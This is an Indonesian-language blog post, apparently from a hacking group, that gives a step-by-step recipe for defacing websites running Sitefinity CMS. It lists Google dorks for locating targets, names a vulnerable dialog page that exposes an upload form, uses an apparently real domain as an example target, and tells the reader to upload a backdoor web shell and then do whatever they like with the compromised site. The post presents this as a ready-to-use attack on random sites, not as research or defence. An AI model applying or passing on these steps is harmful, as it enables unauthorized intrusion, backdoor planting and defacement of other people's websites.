Deface Poc Sitefinity
┏ππΊ━━━━━━━━━━━━━━━━━━━━━━━┓
Deface Sitefinity
INVISIBLE CYBER TEAM
Dork :
inurl:"/Sitefinity/login.aspx"
"UserControls/Dialogs"
"Sitefinity: Login"
(Kembangkan Lagi Dork Tersebut ,
Dengan Imajinasi JAVers nya Vroh :v)
Exploit : /sitefinity/UserControls/ Dialogs/DocumentEditorDialog.aspx
Step By Step :
1. Masukan Dork Di Mesin Pencari kita
(pasti google lah :v).
contoh : inurl:"/Sitefinity/login.aspx"
2. Pilih Salah Satu Target Yang Ingin di
kenthu XD
3. Masukan Exploitnya.
Contoh : www.bechy.com/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
Jika websitenya Vulnerability Maka akan muncul tempat upload.
4. Nah langkah selanjutnya?..Jedodin pala lu ketembok :v .Upload shell backdoor nya lah stah :)
5. Klik upload kalo berhasil gak bakal keluar tulisan /namafil..bla..bla acces denied
6. Nah kalo sudah terupload akses shell backdoornya eksekusinya= www.target.co.li/Files/namafile
7. Kalo sudah diakses shellnya ya terserah mau ente apaain.
Lihat hasilnya :)
selamat mencoba gan :)
Ganbatte:v
Oke thanks - Jangan lupa share.
┗━━━━━━━━━━━━━━━━━━━━━━━πΊ️π┛


Comments
Post a Comment
Harap Berkomentar Dengan Sopan.